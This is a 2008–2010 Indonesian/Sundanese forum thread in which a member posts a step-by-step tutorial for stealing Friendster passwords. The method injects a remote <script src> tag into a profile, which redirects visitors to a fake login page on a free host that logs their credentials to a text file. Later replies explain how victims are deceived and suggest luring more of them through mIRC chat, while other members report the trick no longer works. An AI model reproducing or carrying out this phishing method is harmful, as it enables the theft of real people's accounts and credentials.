IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 hack friendster pasword

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
richie_mang2000
Tim Penghibur
Tim Penghibur


Jumlah posting : 573
Join date : 05.03.08
Age : 31
Lokasi : bandoeng - kopo - bale endah

PostSubyek: hack friendster pasword   Sat Oct 18, 2008 5:49 pm

Very Happy berhubung ada reques saya posting aja dah d sini
ok mendinga kamu download aja dl file zip nya di sini download
dan download juga tools pendukungnya notepad++
saya jelasin dulu fungsi2 file untuk hack fs ini
yang pertama linker gunanya adalah menghubungkan fs dengan script redireck, ada 2 jenis linker yang digunakan untuk hack fs yaitu linker js dan css namun pada bahasan kali ini kita menggunakan linker yang menghubungkan file js, linker yang berjenis js harus diisikan pada fs dibagian custumize profile-ADD MEDIA

Lanjut aja, yang kedua script "link.js" gunanya adalah meredirekkan halaman kita menuju halaman fake login

Dan selanjutnya "login.php" ini merupakan halaman fake login yang nantinya akan diisi oleh korban, sehingga kita bisa mendapatkan password korban dalam file "log.txt"

"log.txt" ini adalah file yang digunakan untuk mengisi hasil password yang telah kita dapatkan


Quote :
langkah-langkah hack fs
1. download dulu notepad++, cari aja digoogle dengan kata kunci "notepad++" nanti pasti keluar
2. buka login.php dengan notepad++, pada line ke 5 ganti alamat [http://profiles.friendster.com/???????] dengan alamat profile fs kamu (contoh = http://profiles.friendster.com/55912299)
3. daftar ke freehosting terserah kamu alamatnya (contoh=www.badwaresite.www;www.110mb.com;www.000webhost.com)
4. upload "login.php" dan "log.txt"
5. buka link.js dengan notepad++ lalu ganti tulisan pada line 37 [URL KAMU UPLOAD http://?????????/login.php] dengan alamat login.php yang telah kamu upload (contoh = http://dodol.110mb.com/login.php)
6. upload link.js ke hosting kamu
7. selanjutnya buka file linker.txt dengan notepad++ pada line ke 2 ganti [URL Upload http://?????/link.js] dengan alamat link.js (contoh = http://dodol.110mb.com/link.js) yang telah kamu hosting, setelah itu kopi semua tulisan yang ada dalam file linker.txt ke dalam add media nya friednster
8. berhasil-berhasil langsung ke FAKE LOGIN

source buat hack fs joged
Quote :

<script src="LINK OF YOUR JS"></script>

mudah-mudahan gampang di pahami alohuakbar pergunakan dengan baik dan benar nya Very Happy

_________________




Kembali Ke Atas Go down
Lihat profil user http://mangsani.net78.net
dabull
Derektor
Derektor


Jumlah posting : 859
Join date : 01.04.08
Age : 21
Lokasi : Ranca BaoK..pas pengkolan Cilegeung

PostSubyek: Re: hack friendster pasword   Sat Oct 18, 2008 7:23 pm

sarmang teu ngarti Laughing
praktekeun langsungggg kadie
Kembali Ke Atas Go down
Lihat profil user
richie_mang2000
Tim Penghibur
Tim Penghibur


Jumlah posting : 573
Join date : 05.03.08
Age : 31
Lokasi : bandoeng - kopo - bale endah

PostSubyek: Re: hack friendster pasword   Sun Oct 19, 2008 1:23 am

dabull wrote:
sarmang teu ngarti Laughing
praktekeun langsungggg kadie

bakal di jamu moal heot

_________________




Kembali Ke Atas Go down
Lihat profil user http://mangsani.net78.net
xX+gaga+Xx
Murid Baru
Murid Baru


Jumlah posting : 3
Join date : 16.04.08
Age : 24
Lokasi : ‡bojongsoang.street‡

PostSubyek: wow. di test ahk. heu*   Sun Nov 09, 2008 11:03 am

hehe.

sama saiia mau di test ahk kang.

hoho.

hatur nuhun sa teu acan na.

gak akan pake yg negatif saiia maa.

i'am PROMISE
Kembali Ke Atas Go down
Lihat profil user http://profiles.friendster.com/xxfvckxx
muse
Rektor
Rektor


Jumlah posting : 683
Join date : 05.03.08
Age : 29
Lokasi : Unknow Command Eror

PostSubyek: Re: hack friendster pasword   Mon Nov 10, 2008 12:52 am

!! oh my GOD.
ada aja mankk ni lieurr uii hapy smile
Kembali Ke Atas Go down
Lihat profil user http://muse.mu/index.php
Andi
Murid Baru
Murid Baru


Jumlah posting : 1
Join date : 11.11.08
Age : 30

PostSubyek: Aku masih belum ngerti mas ?   Tue Nov 11, 2008 8:06 am

Mas, aku masih belum ngerti, tolong diajarin dong, pake bahasa awam ?
Or, send to my Email aja ya!
Please?
Kembali Ke Atas Go down
Lihat profil user
richie_mang2000
Tim Penghibur
Tim Penghibur


Jumlah posting : 573
Join date : 05.03.08
Age : 31
Lokasi : bandoeng - kopo - bale endah

PostSubyek: Re: hack friendster pasword   Wed Nov 12, 2008 9:03 am

Andi wrote:
Mas, aku masih belum ngerti, tolong diajarin dong, pake bahasa awam ?
Or, send to my Email aja ya!
Please?

coba lebih di perdalami lagi ya brow soalnya udah di perjelas sejelas mungkin gt
ato ga add me richie_mang2000

lol!

_________________




Kembali Ke Atas Go down
Lihat profil user http://mangsani.net78.net
magicfr90
Murid Baru
Murid Baru


Jumlah posting : 2
Join date : 13.11.08

PostSubyek: ga ngerti   Thu Nov 13, 2008 2:43 pm

met kenal...
cara kerjanya gmana ya,??
gmna membuat supaya page login nya muncul ?? Sad

Smile
Kembali Ke Atas Go down
Lihat profil user
ivanclover
Murid Baru
Murid Baru


Jumlah posting : 3
Join date : 14.11.08
Age : 29
Lokasi : makassar

PostSubyek: Re: hack friendster pasword   Sat Nov 15, 2008 12:00 am

dabull wrote:
sarmang teu ngarti Laughing
praktekeun langsungggg kadie
Kembali Ke Atas Go down
Lihat profil user
[I][B][L][I][S][10]
Murid Baru
Murid Baru


Jumlah posting : 22
Join date : 19.08.08
Age : 28
Lokasi : bandung lah,,maenya d naraka

PostSubyek: Re: hack friendster pasword   Sat Nov 15, 2008 5:06 pm

mank palu

what are u fuc*ing talking about sech ada aja

sok teu kahalarti yeee
Kembali Ke Atas Go down
Lihat profil user
adew_SardeW
Tim penghibur
Tim penghibur


Jumlah posting : 860
Join date : 05.03.08
Age : 30
Lokasi : Ls 20 derajat-Bt 23 derajat-Lu 32 derajat East Bandung

PostSubyek: Re: hack friendster pasword   Thu Nov 20, 2008 6:36 am

magicfr90 wrote:
met kenal...
cara kerjanya gmana ya,??
gmna membuat supaya page login nya muncul ?? Sad

Smile

cara kerja nyack .... saat victim melihat profile friendster kita .... dan tidak begitu lama atau dalam hitungan
persekian detik itu juga klo koneksinya lagi bagus banget ,,,, profile kita akan berubah menjadi halaman login,.,
jadi c victim mengira dia belum login atw log out automatis sok karena c victim penasaran pengen liat friendster kita ..akhirnya dia login menggunakan emai dan pass friendsternya ...padahal itu sebuah jebakkan dimana...
email dan pass friendster c victim akan terkirim ke inbox message friendster kita............

gimana membuat supaya page login nya muncul..... ikuti langkah-langkah sebelumnya yang telah diterangkan oleh saudara Hideung alias amank_keling cameuh ...


thx,,,,,,,,,,,,,,,,,, tatah sampai ketemu di episode mendatang ,.,,,salam kokoders metal metal metal
Kembali Ke Atas Go down
Lihat profil user http://profiles.friendster.com/sardew
magicfr90
Murid Baru
Murid Baru


Jumlah posting : 2
Join date : 13.11.08

PostSubyek: Re: hack friendster pasword   Sat Nov 22, 2008 8:35 pm

adew_SardeW wrote:


cara kerja nyack .... saat victim melihat profile friendster kita .... dan tidak begitu lama atau dalam hitungan
persekian detik itu juga klo koneksinya lagi bagus banget ,,,, profile kita akan berubah menjadi halaman login,.,
jadi c victim mengira dia belum login atw log out automatis sok karena c victim penasaran pengen liat friendster kita ..akhirnya dia login menggunakan emai dan pass friendsternya ...padahal itu sebuah jebakkan dimana...
email dan pass friendster c victim akan terkirim ke inbox message friendster kita............

gimana membuat supaya page login nya muncul..... ikuti langkah-langkah sebelumnya yang telah diterangkan oleh saudara Hideung alias amank_keling cameuh ...


thx,,,,,,,,,,,,,,,,,, tatah sampai ketemu di episode mendatang ,.,,,salam kokoders metal metal metal

makasih da dijelasin Very Happy
numpang nanya lagi Very Happy,hehe , "linker" di taruh di add media friendster kan...?
kok yang kejebak w sendiri ???
si victim ga pernah kejebak Rolling Eyes
Kembali Ke Atas Go down
Lihat profil user
adew_SardeW
Tim penghibur
Tim penghibur


Jumlah posting : 860
Join date : 05.03.08
Age : 30
Lokasi : Ls 20 derajat-Bt 23 derajat-Lu 32 derajat East Bandung

PostSubyek: Re: hack friendster pasword   Sat Nov 29, 2008 9:51 am

c victim gak kena kemungkinan c victim udah tau script itu sebuah jebakkan ...atw s victim biasa nya langsung klick home .....atw pas browsing c victim menggunakan IE bukan Mozilla FE.....karena script ini biasa nyack tampil di mozilla doank ,,,klo di IE biasanya missing plugin gitu dech .,...atw c victim tidak meng enablekan Java nyack disettingan mozilla nyack ...

kenapa kamu terjebak sendiri ,,,karena udah jelas tampilan profile km berubah wlwpun kamu admin fs itu sendiri setiap km liat profile sendiri udah pst script itu muncul ......

bikin Fs baru lagi dech kk jangan masukkin script itu diFs yang sering km pake Twisted Evil tv masukkin script itu diFs baru kk.,...abis itu cari victim sebanyak-banyak kmu mau,,,,,chating dech di MIRC biar banyak korban mah Embarassed Embarassed Embarassed ...
Kembali Ke Atas Go down
Lihat profil user http://profiles.friendster.com/sardew
baronz
Murid Baru
Murid Baru


Jumlah posting : 1
Join date : 13.12.08

PostSubyek: Re: hack friendster pasword   Sat Dec 13, 2008 3:23 pm

om,,
yang ada kok malah FS gw gak bs dibuka yah ???

padahal semua langkah udah gw ikutin Surprised
Kembali Ke Atas Go down
Lihat profil user
o3jamnx
Murid Baru
Murid Baru


Jumlah posting : 1
Join date : 15.12.08

PostSubyek: Re: hack friendster pasword   Mon Dec 15, 2008 10:51 pm

mas aku uda coba cara yg d atas sama percis tp kok ga terjadi apa2 ya.......
caranya klo ad org msk profile kita langsung di alihkan ke yg laen kan.....???
saya cba pke ID tmn saya truz msk ke profile saya tdk terjadi apa2....
tolong apakah ada yg salah??? apa emang uda g bs....???
Kembali Ke Atas Go down
Lihat profil user
tuan kentang
Murid Baru
Murid Baru


Jumlah posting : 2
Join date : 18.01.09

PostSubyek: richie_mang2000   Mon Jan 19, 2009 1:03 am

web hosting yg gampang apa ya..??
ada rekomendasian..??
di 110mb, abis dftr, ga ada tulisan uploadnya.
bingung, mw upload file gmn.
ada yg bisa nutor???

tengkyu banyak.
Mad
Kembali Ke Atas Go down
Lihat profil user
tuan kentang
Murid Baru
Murid Baru


Jumlah posting : 2
Join date : 18.01.09

PostSubyek: richie_mang2000   Mon Jan 19, 2009 3:05 am

hallo hallo kawan2..
adakah cara menghack FS lewat fake login yg lebih gampang???

mgkn sy ada kesalahan dlm proses yg dikasi mas "richie_mang2000"

pada tutorial nomer 7. selanjutnya buka file linker.txt dengan notepad++ pada line ke 2 ganti [URL Upload http://?????/link.js] dengan alamat link.js (contoh = http://dodol.110mb.com/link.js) yang telah kamu hosting, setelah itu kopi semua tulisan yang ada dalam file linker.txt ke dalam add media nya friednster

yg ada cuma linker.txt yg isinya <script src="LINK OF YOUR JS"></script>
dan URL Upload http://?????/link.js-nya ga ada.
mohon tutorialnya lebi detail.
dan apakah temen2 ada yg punya cara buka private profile.

hehe..banyak tanya kan gpp, biar ga sesat di jalan.
hihihihihihihihih Very Happy
makasi semua....
Kembali Ke Atas Go down
Lihat profil user
crampon
Murid Baru
Murid Baru


Jumlah posting : 1
Join date : 09.02.09

PostSubyek: Re: hack friendster pasword   Mon Feb 09, 2009 7:10 pm

slm knal sblumnya:tingting:..mang cara ini masih bsa yach???
koq udh gw cb gk terjadi apa2 di fs nya???
cb sya view fs palsu yg gw buat pake fs asli, gk muncul tuch fake loginnya???
pa da yg udh berhasil nggunanin ni cara???
Kembali Ke Atas Go down
Lihat profil user
zarbiruputih
Murid Baru
Murid Baru


Jumlah posting : 8
Join date : 14.04.09
Lokasi : MeKaH

PostSubyek: Re: hack friendster pasword   Tue Apr 14, 2009 5:13 pm

Quote :
berhubung ada reques saya posting aja dah d sini
ok mendinga kamu download aja dl file zip nya di sini download
dan download juga tools pendukungnya notepad++
saya jelasin dulu fungsi2 file untuk hack fs ini
yang pertama linker gunanya adalah menghubungkan fs dengan script redireck, ada 2 jenis linker yang digunakan untuk hack fs yaitu linker js dan css namun pada bahasan kali ini kita menggunakan linker yang menghubungkan file js, linker yang berjenis js harus diisikan pada fs dibagian custumize profile-ADD MEDIA

Lanjut aja, yang kedua script "link.js" gunanya adalah meredirekkan halaman kita menuju halaman fake login

Dan selanjutnya "login.php" ini merupakan halaman fake login yang nantinya akan diisi oleh korban, sehingga kita bisa mendapatkan password korban dalam file "log.txt"

"log.txt" ini adalah file yang digunakan untuk mengisi hasil password yang telah kita dapatkan


lain na PRENSTER teh ayeuna mah tos di patch ku admin na ?? !!
Kembali Ke Atas Go down
Lihat profil user http://zarbiruputih.we.bs/tester.html
vai_ieky
Tim penghibur
Tim penghibur


Jumlah posting : 568
Join date : 07.03.08
Age : 34
Lokasi : Majalaya - Bandung

PostSubyek: Re: hack friendster pasword   Mon Oct 11, 2010 6:03 pm

fb ayeuna mah banyak na, fs jarang pisan nu ningalian na Embarassed
Kembali Ke Atas Go down
Lihat profil user http://www.facebook.com/vai.ieky
zarbiruputih
Murid Baru
Murid Baru


Jumlah posting : 8
Join date : 14.04.09
Lokasi : MeKaH

PostSubyek: hack friendster pasword   Sat Nov 13, 2010 12:38 pm

enya bener ..
tp babari angus ..
tw hosting murah meriah ga boy?
Kembali Ke Atas Go down
Lihat profil user http://zarbiruputih.we.bs/tester.html
Sponsored content




PostSubyek: Re: hack friendster pasword   Today at 11:17 pm

Kembali Ke Atas Go down
 
hack friendster pasword
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: sekedar bertukar hoby :: Design. Web Design. Your Blog Post Here :: friendster-
Navigasi: